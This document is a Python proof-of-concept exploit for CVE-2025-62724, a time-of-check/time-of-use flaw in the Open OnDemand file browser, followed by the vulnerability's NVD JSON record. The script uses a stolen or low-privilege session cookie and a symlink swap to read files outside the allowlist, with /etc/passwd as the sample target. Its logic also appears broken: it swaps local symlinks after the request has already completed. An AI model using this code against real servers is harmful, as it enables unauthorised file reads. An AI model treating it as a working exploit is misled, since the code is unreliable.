CVE-2025-62724

import zipfile import os import time import requests # CVE-2025-62724 PoC - Open OnDemand TOCTOU Vulnerability # Target: Open OnDemand < 4.0.8 or < 3.1.16 class TOCTOUExploit: def __init__(self, target_url, session_cookie): self.target_url = target_url.rstrip('/') self.session_cookie = session_cookie self.session = requests.Session() def download_file(self, file_path): """Download file through file browser""" url = f"{self.target_url}/files/download{file_path}" headers = {'Cookie': f'ood_session={self.session_cookie}'} response = self.session.get(url, headers=headers) return response.content def exploit_toctou(self, allowed_file, target_file): """ TOCTOU attack: 1. Request allowed file 2. Replace symlink during check window 3. Retrieve target file content """ # Step 1: Create symlink to allowed file allowed_link = f"{allowed_file}_link" os.symlink(allowed_file, allowed_link) # Step 2: Trigger download request # Race condition window starts here response = self.session.get( f"{self.target_url}/files/download{allowed_link}", headers={'Cookie': f'ood_session={self.session_cookie}'} ) # Step 3: During race window, replace symlink # attacker replaces allowed_link -> target_file os.remove(allowed_link) os.symlink(target_file, allowed_link) # Step 4: Extract downloaded content if response.status_code == 200: try: with zipfile.ZipFile(response.content) as zf: # Files outside allowlist may be extracted return zf.namelist() except: return response.content return None # Usage example # exploit = TOCTOUExploit('https://ondemand.example.com', 'your_session_cookie') # content = exploit.exploit_toctou('/public/allowed.txt', '/etc/passwd') print('[+] CVE-2025-62724 PoC for Open OnDemand TOCTOU vulnerability') print('[+] Target versions: Open OnDemand < 4.0.8 and < 3.1.16') print('[+] Requires: Low-privilege user account, file browser access') print('[+] Impact: Arbitrary file read via allowlist bypass')

{"cve": {"id": "CVE-2025-62724", "sourceIdentifier": "[email protected]", "published": "2025-11-20T17:15:51.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open OnDemand is an open-source HPC portal. Prior to versions 4.0.8 and 3.1.16, users can craft a \"Time of Check to Time of Use\" (TOCTOU) attack when downloading zip files to access files outside of the OOD_ALLOWLIST. This vulnerability impacts sites that use the file browser allowlists in all current versions of OOD. However, files accessed are still protected by the UNIX permissions. Open OnDemand versions 4.0.8 and 3.1.16 have been patched for this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}, {"lang": "en", "value": "CWE-367"}]}], "references": [{"url": "https://github.com/OSC/ondemand/security/advisories/GHSA-vjpg-34px-gjrw", "source": "[email protected]"}]}}